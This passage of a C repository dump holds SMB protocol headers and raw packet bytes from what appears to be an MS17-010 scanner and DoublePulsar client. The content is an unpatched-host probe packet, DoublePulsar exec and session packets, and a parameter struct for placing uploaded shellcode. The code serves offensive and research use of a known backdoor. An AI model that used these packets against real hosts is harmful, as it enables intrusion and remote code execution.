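#define DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET_SIZE 82
static_assert(sizeof(DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET) - 1 == DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET_SIZE,
              "DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET_SIZE does not match the literal");
/* Bytes the caller still owes on the wire after sending the FIRST packet. */
#define DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_REMAINING_DATA_SIZE 0x1000
static_assert(DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_FIRST_PACKET_SIZE + DOUBLE_PULSAR_EXEC_TRANS2_SESSION_SETUP_REMAINING_DATA_SIZE == 0x104e + 4,
              "NetBIOS length of the EXEC packet must equal header bytes + 4096 data bytes");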
462 |
463 |
464 |
465 |
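/*
 * SMB_COM_TREE_DISCONNECT (0x71) for TID 0x0800, UID 0x0800, PID 0xfeff,
 * MID 0x0041; WordCount 0, ByteCount 0.  39 bytes = NetBIOS length 0x23 + 4.
 * NOTE(review): TID/UID are hard-coded; they only match a session in which
 * the server really assigned those ids.
 */
#define DOUBLE_PULSAR_TREE_DISCONNECT_PACKET "\x00\x00\x00\x23\xff\x53\x4d\x42\x71\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
"\x00\x08\x41\x00\x00\x00\x00"

#define DOUBLE_PULSAR_TREE_DISCONNECT_PACKET_SIZE 39
static_assert(sizeof(DOUBLE_PULSAR_TREE_DISCONNECT_PACKET) - 1 == DOUBLE_PULSAR_TREE_DISCONNECT_PACKET_SIZE,
              "DOUBLE_PULSAR_TREE_DISCONNECT_PACKET_SIZE does not match the literal");


/*
 * SMB_COM_LOGOFF_ANDX (0x74) for UID 0x0800, PID 0xfeff, MID 0x0041;
 * WordCount 2, AndXCommand 0xff (none), AndXOffset 0x27, ByteCount 0.
 * 43 bytes = NetBIOS length 0x27 + 4.
 */
#define DOUBLE_PULSAR_LOGOFF_ANDX_PACKET "\x00\x00\x00\x27\xff\x53\x4d\x42\x74\x00\x00\x00\x00\x18\x07\xc0" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe" \
"\x00\x08\x41\x00\x02\xff\x00\x27\x00\x00\x00"

#define DOUBLE_PULSAR_LOGOFF_ANDX_PACKET_SIZE 43
static_assert(sizeof(DOUBLE_PULSAR_LOGOFF_ANDX_PACKET) - 1 == DOUBLE_PULSAR_LOGOFF_ANDX_PACKET_SIZE,
              "DOUBLE_PULSAR_LOGOFF_ANDX_PACKET_SIZE does not match the literal");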
478 |
479 |
480 |
481 |
482 |
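/*
 * SMB_COM_TRANSACTION (0x25), WordCount 0x10 (SetupCount 2), Setup[0] = 0x0023
 * (TRANS_PEEK_NMPIPE) with FID 0x0000, transaction name "\PIPE\" in the byte
 * block.  Header values differ from the other packets in this file: Flags2
 * 0x6845, a non-zero SecurityFeatures field, PID 0x5a09, UID 0x0802, MID 1.
 * 79 bytes = NetBIOS length 0x4b + 4.
 * NOTE(review): this is the classic MS17-010 probe shape; a receiver that
 * answers with STATUS_INSUFF_SERVER_RESOURCES is generally read as unpatched.
 * Treat the fingerprint as a hint only -- verify it in your own environment.
 */
#define EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET "\x00\x00\x00\x4b\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x45\x68" \
"\x00\x00\xb9\x10\x4f\xef\x85\x1a\xb6\x20\x00\x00\x00\x08\x09\x5a" \
"\x02\x08\x01\x00\x10\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x4a\x00\x02" \
"\x00\x23\x00\x00\x00\x07\x00\x5c\x50\x49\x50\x45\x5c\x00\x00"


#define EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET_SIZE 79
static_assert(sizeof(EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET) - 1 == EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET_SIZE,
              "EQUATION_GROUP_TRANS_PEEK_NAMEDPIPE_PACKET_SIZE does not match the literal");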
491 |
--------------------------------------------------------------------------------
/smbtransaction.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #pragma once
3 | #include "smbmacros.h"
4 |
5 | #pragma pack(push, 1)
6 |
/*
 * SMB_COM_TRANSACTION request, fixed-size part.  The 14 WORDs of parameter
 * block (28 bytes) give WordCount = 14 + SetupCount.  #pragma pack(1) above
 * makes this the wire layout; fields are little-endian on the wire.
 * Buffer[1] only marks where the variable part begins: the Setup words,
 * ByteCount, Name, Parameters and Data listed below follow it and are NOT
 * covered by sizeof(REQ_TRANSACTION).
 * NOTE(review): if this struct is ever overlaid on bytes received from a
 * peer, ParameterOffset/ParameterCount/DataOffset/DataCount are
 * peer-controlled and must be bounds-checked against the received length
 * before being used to index into the message.
 */
typedef struct _REQ_TRANSACTION {
	BYTE WordCount;            // 14 + SetupCount
	WORD TotalParameterCount;
	WORD TotalDataCount;
	WORD MaxParameterCount;
	WORD MaxDataCount;
	BYTE MaxSetupCount;
	BYTE Reserved;
	WORD Flags;
	DWORD Timeout;
	WORD Reserved2;
	WORD ParameterCount;       // bytes of Parameters in THIS message
	WORD ParameterOffset;      // offset of Parameters from the SMB header
	WORD DataCount;            // bytes of Data in THIS message
	WORD DataOffset;           // offset of Data from the SMB header
	BYTE SetupCount;           // number of Setup WORDs that follow
	BYTE Reserved3;
	BYTE Buffer[1];            // start of the variable part (see below)
	//USHORT Setup[]; // Setup words (# = SetupWordCount)
	//USHORT ByteCount; // Count of data bytes
	//UCHAR Name[]; // Name of transaction (NULL if Transact2)
	//UCHAR Pad[]; // Pad to SHORT or LONG
	//UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
	//UCHAR Pad1[]; // Pad to SHORT or LONG
	//UCHAR Data[]; // Data bytes (# = DataCount)
}REQ_TRANSACTION, * PREQ_TRANSACTION;
33 |
/*
 * SMB_COM_NT_TRANSACT request, fixed-size part.  The fields between WordCount
 * and Function total 38 bytes, so WordCount = 19 + SetupCount.
 * The WORD named Flags here is the one MS-CIFS lists as Reserved1 (must be 0)
 * -- name kept for compatibility with existing callers.
 * CAUTION: ByteCount is placed directly after Function, which is only the
 * wire layout when SetupCount == 0.  With SetupCount > 0 the Setup WORDs come
 * first and ByteCount follows them (as the trailing comment lists it), so a
 * caller building or parsing such a message must not use this ByteCount
 * member as the real byte count.
 */
typedef struct _REQ_NT_TRANSACTION {
	BYTE WordCount;            // 19 + SetupCount
	BYTE MaxSetupCount;
	WORD Flags;                // Reserved1 in MS-CIFS
	DWORD TotalParameterCount;
	DWORD TotalDataCount;
	DWORD MaxParameterCount;
	DWORD MaxDataCount;
	DWORD ParameterCount;
	DWORD ParameterOffset;
	DWORD DataCount;
	DWORD DataOffset;
	BYTE SetupCount;
	WORD Function;             // NT_TRANSACT subfunction code
	WORD ByteCount;            // only correct here when SetupCount == 0
	BYTE Buffer[1];
	//USHORT Setup[]; // Setup words (# = SetupWordCount)
	//USHORT ByteCount; // Count of data bytes
	//UCHAR Pad1[]; // Pad to LONG
	//UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
	//UCHAR Pad2[]; // Pad to LONG
	//UCHAR Data[]; // Data bytes (# = DataCount)
}REQ_NT_TRANSACTION, * PREQ_NT_TRANSACTION;
57 |
/*
 * Interim (acknowledgement) response to SMB_COM_NT_TRANSACT: no parameter
 * words, so WordCount and ByteCount are expected to be 0.  Buffer[1] is a
 * placeholder; nothing meaningful follows in a well-formed interim reply.
 */
typedef struct _RESP_NT_TRANSACTION_INTERIM {
	BYTE WordCount;            // 0
	WORD ByteCount;            // 0
	BYTE Buffer[1];
}RESP_NT_TRANSACTION_INTERIM, * PRESP_NT_TRANSACTION_INTERIM;
63 |
/*
 * Final SMB_COM_NT_TRANSACT response, fixed-size part (36 bytes of parameter
 * words -> WordCount = 18 + SetupCount).  The Setup words, ByteCount and the
 * padded Parameters/Data follow Buffer and are not part of sizeof().
 * NOTE(review): ParameterOffset/ParameterCount/DataOffset/DataCount come from
 * the server; validate them against the received length before indexing.
 */
typedef struct _RESP_NT_TRANSACTION {
	BYTE WordCount; // Count of data bytes; value = 18 + SetupCount
	BYTE Reserved1;
	WORD Reserved2;
	DWORD TotalParameterCount;
	DWORD TotalDataCount;
	DWORD ParameterCount;
	DWORD ParameterOffset;
	DWORD ParameterDisplacement;   // offset of this chunk within the full parameter block
	DWORD DataCount;
	DWORD DataOffset;
	DWORD DataDisplacement;        // offset of this chunk within the full data block
	BYTE SetupCount;
	BYTE Buffer[1];
	//USHORT Setup[]; // Setup words (# = SetupWordCount)
	//USHORT ByteCount; // Count of data bytes
	//UCHAR Pad1[]; // Pad to LONG
	//UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
	//UCHAR Pad2[]; // Pad to SHORT or LONG
	//UCHAR Data[]; // Data bytes (# = DataCount)
}RESP_NT_TRANSACTION, * PRESP_NT_TRANSACTION;
85 |
/*
 * SMB_COM_NT_TRANSACT_SECONDARY request: continues a transaction opened by
 * an NT_TRANSACT whose TotalParameterCount/TotalDataCount exceeded what the
 * first message carried.  36 bytes of parameter words -> WordCount = 18.
 * Here ByteCount really does sit right after the words (there is no Setup),
 * so sizeof() up to Buffer is the complete fixed header.
 */
typedef struct _REQ_NT_TRANSACTION_SECONDARY {
	BYTE WordCount;            // 18
	BYTE Reserved1;
	WORD Reserved2;
	DWORD TotalParameterCount;
	DWORD TotalDataCount;
	DWORD ParameterCount;
	DWORD ParameterOffset;
	DWORD ParameterDisplacement;   // where this chunk lands in the parameter block
	DWORD DataCount;
	DWORD DataOffset;
	DWORD DataDisplacement;        // where this chunk lands in the data block
	BYTE Reserved3;
	WORD ByteCount;
	BYTE Buffer[1];
	//UCHAR Pad1[]; // Pad to LONG
	//UCHAR Parameters[]; // Parameter bytes (# = ParameterCount)
	//UCHAR Pad2[]; // Pad to LONG
	//UCHAR Data[]; // Data bytes (# = DataCount)
}REQ_NT_TRANSACTION_SECONDARY, * PREQ_NT_TRANSACTION_SECONDARY;
106 |
107 | /*typedef struct REQ_TRANSACTION2{
108 | BYTE WordCount;
109 | //words:
110 | WORD TotalParameterCount;
111 | WORD TotalDataCount;
112 | WORD MaxParameterCount;
113 | WORD MaxDataCount;
114 | BYTE MaxSetupCount;
115 | BYTE Reserved1;
116 | WORD Flags;
117 | DWORD Timeout;
118 | WORD Reserved2;
119 | WORD ParameterCount;
120 | WORD ParameterOffset;
121 | WORD DataCount;
122 | WORD DataOffset;
123 | BYTE SetupCount;
124 | BYTE Reserved3;
125 | //USHORT Setup[SetupCount];
126 | //smb Data:
127 | BYTE Bytes[1];
128 | }*PREQ_TRANSACTION2;
129 | */
/*
 * Interim (acknowledgement) response to SMB_COM_TRANSACTION: WordCount and
 * ByteCount are expected to be 0.  Same shape as RESP_NT_TRANSACTION_INTERIM.
 */
typedef struct _RESP_TRANSACTION_INTERIM {
	BYTE WordCount;            // 0
	WORD ByteCount;            // 0
	BYTE Buffer[1];
}RESP_TRANSACTION_INTERIM, * PRESP_TRANSACTION_INTERIM;
135 |
/*
 * Final SMB_COM_TRANSACTION response, fixed-size part: 9 WORDs + 2 BYTEs =
 * 20 bytes of parameter words -> WordCount = 10 + SetupCount.  Setup words,
 * ByteCount and the padded Parameters/Data follow Buffer.
 * NOTE(review): the *Offset/*Count fields are server-supplied; bounds-check
 * them against the received length before dereferencing into the message.
 */
typedef struct _RESP_TRANSACTION {
	BYTE WordCount;            // 10 + SetupCount
	WORD TotalParameterCount;
	WORD TotalDataCount;
	WORD Reserved;
	WORD ParameterCount;
	WORD ParameterOffset;
	WORD ParameterDisplacement;
	WORD DataCount;
	WORD DataOffset;
	WORD DataDisplacement;
	BYTE SetupCount;
	BYTE Reserved2;
	BYTE Buffer[1];
}RESP_TRANSACTION, * PRESP_TRANSACTION;
151 |
/*
 * SMB_COM_TRANSACTION_SECONDARY request (the 0x26 messages in
 * smbpacketstrings.h): 8 WORDs of parameter words -> WordCount = 8.  It has
 * no Setup, so ByteCount genuinely follows the words and the fixed header ends
 * at Buffer; Pad/Parameters/Pad/Data follow as listed below.
 * The Displacement fields say where this chunk is written inside the
 * transaction's parameter/data buffers that the primary request sized.
 */
typedef struct _REQ_TRANSACTION_SECONDARY {
	BYTE WordCount;            // 8
	WORD TotalParameterCount;
	WORD TotalDataCount;
	WORD ParameterCount;
	WORD ParameterOffset;
	WORD ParameterDisplacement;
	WORD DataCount;
	WORD DataOffset;
	WORD DataDisplacement;
	WORD ByteCount;
	BYTE Buffer[1];
	// UCHAR Pad1[];
	// UCHAR Trans_Parameters[ParameterCount];
	// UCHAR Pad2[];
	// UCHAR Trans_Data[DataCount];
}REQ_TRANSACTION_SECONDARY, * PREQ_TRANSACTION_SECONDARY;
169 |
/*
 * SMB_COM_TRANSACTION2 request, fixed-size part.  Identical field layout to
 * REQ_TRANSACTION (28 bytes of words -> WordCount = 14 + SetupCount); the
 * difference is in what follows Buffer: Setup[0] carries the Trans2
 * subcommand (e.g. 0x000e SESSION_SETUP, see REQ_TRANSACTION2_SESSION_SETUP)
 * and there is no Name string.
 */
typedef struct _REQ_TRANSACTION2 {
	BYTE WordCount;            // 14 + SetupCount
	WORD TotalParameterCount;
	WORD TotalDataCount;
	WORD MaxParameterCount;
	WORD MaxDataCount;
	BYTE MaxSetupCount;
	BYTE Reserved1;
	WORD Flags;
	DWORD Timeout;
	WORD Reserved2;
	WORD ParameterCount;
	WORD ParameterOffset;
	WORD DataCount;
	WORD DataOffset;
	BYTE SetupCount;
	BYTE Reserved3;
	BYTE Buffer[1];            // Setup words start here
}REQ_TRANSACTION2, * PREQ_TRANSACTION2;
189 |
/*
 * The 12-byte Trans2 SESSION_SETUP parameter block, viewable three ways:
 * as three named DWORDs, as a DWORD[3], or as raw bytes (for memcpy into a
 * packet).  The field names reflect how the DoublePulsar exec request uses
 * them; the CHECK packet sends all twelve bytes as zero.
 * Relies on an anonymous struct inside a union (MSVC extension / C11), so
 * this header is not strictly portable C++.
 */
typedef struct _TRANS2_SESSION_SETUP_PARAMETERS {
	union {
		struct {
			DWORD LengthOne;
			DWORD LengthTwo;
			DWORD OffsetToCopyShellcodeTo;
		};
		DWORD ParameterDoublewords[3];
		BYTE ParameterBytes[sizeof(DWORD) * 3];   // 12 raw bytes, same storage
	};
}TRANS2_SESSION_SETUP_PARAMETERS, * PTRANS2_SESSION_SETUP_PARAMETERS;
201 |
202 |
203 |
/*
 * Tail of a Trans2 SESSION_SETUP request: this is what sits at
 * REQ_TRANSACTION2::Buffer (Setup word, ByteCount, one pad byte, the 12
 * parameter bytes, then the data).  It is not a complete SMB on its own.
 * ByteCount covers Padding + SessionSetupParameters + data, hence
 * DataCount + 13.  SessionSetupData[1] only marks where the data begins.
 */
typedef struct _REQ_TRANSACTION2_SESSION_SETUP {
	WORD SubCommand; //should be 0x000e
	WORD ByteCount; //should be DataCount + 13 (sizeof(TRANS2_SESSION_SETUP_PARAMETERS) + 1 should eq. 13)
	BYTE Padding[1]; //should be 0x00
	TRANS2_SESSION_SETUP_PARAMETERS SessionSetupParameters; //Trans2 SESSION_SETUP Params
	BYTE SessionSetupData[1]; //Trans2 SESSION_SETUP Data
}REQ_TRANSACTION2_SESSION_SETUP, * PREQ_TRANSACTION2_SESSION_SETUP;
211 |
212 |
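/*
 * Final SMB_COM_TRANSACTION2 response, fixed-size part.  On the wire it has
 * exactly the same parameter words as the SMB_COM_TRANSACTION response
 * (RESP_TRANSACTION above): 9 WORDs + SetupCount + Reserved2 = 20 bytes, so
 * WordCount = 10 + SetupCount.
 * Fix: the previous definition omitted DataOffset between DataCount and
 * DataDisplacement, which shifted DataDisplacement, SetupCount, Reserved2
 * and Buffer two bytes early when this struct was overlaid on a response.
 * Existing field names are unchanged; only the missing WORD is inserted.
 * NOTE(review): the *Offset/*Count fields are server-supplied; bounds-check
 * them against the received length before dereferencing into the message.
 */
typedef struct _RESP_TRANSACTION2 {
	BYTE WordCount;            // 10 + SetupCount
	WORD TotalParameterCount;
	WORD TotalDataCount;
	WORD Reserved1;
	WORD ParameterCount;
	WORD ParameterOffset;
	WORD ParameterDisplacement;
	WORD DataCount;
	WORD DataOffset;           // offset of Data from the SMB header (was missing)
	WORD DataDisplacement;
	BYTE SetupCount;
	BYTE Reserved2;
	BYTE Buffer[1];            // Setup words, ByteCount, Parameters, Data follow
}RESP_TRANSACTION2, * PRESP_TRANSACTION2;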
227 |
228 | #pragma pack(pop)
--------------------------------------------------------------------------------
/treeconnectandx.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include "sessionsetupandx.h"
3 |
4 | #pragma pack(push, 1)
5 |
/*
 * SMB_COM_TREE_CONNECT_ANDX request, fixed part.  ANDX (AndXCommand /
 * AndXReserved / AndXOffset) is presumably defined in sessionsetupandx.h,
 * included above.  Andx + Flags + PasswordLength are 4 WORDs -> WordCount 4.
 * Packed to 1 byte by the pragma above.
 * Password is only the FIRST byte of a PasswordLength-byte field, so Buffer
 * (pad, Path, Service) sits at the right place only when PasswordLength == 1;
 * for any other length the caller has to compute the offset itself.
 * Only the pointer typedef is provided here, unlike the other headers; use
 * the struct tag REQ_TREE_CONNECT_ANDX for the value type.
 */
typedef struct REQ_TREE_CONNECT_ANDX {
	BYTE WordCount;            // 4
	ANDX Andx;
	WORD Flags;
	WORD PasswordLength;
	WORD Bytecount;
	union {
		struct {
			BYTE Password;     // first byte of Password[PasswordLength]
			BYTE Buffer[1];    // Path / Service follow (see note above)
		};
		BYTE Bytes[2];         // same two bytes, viewed raw
	};
}*PREQ_TREE_CONNECT_ANDX;
20 |
21 | #pragma pack(pop)
22 |
--------------------------------------------------------------------------------
/windowssocket.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #define UNICODE
3 | #include
4 | #include
5 | #include
6 | #include
7 |
--------------------------------------------------------------------------------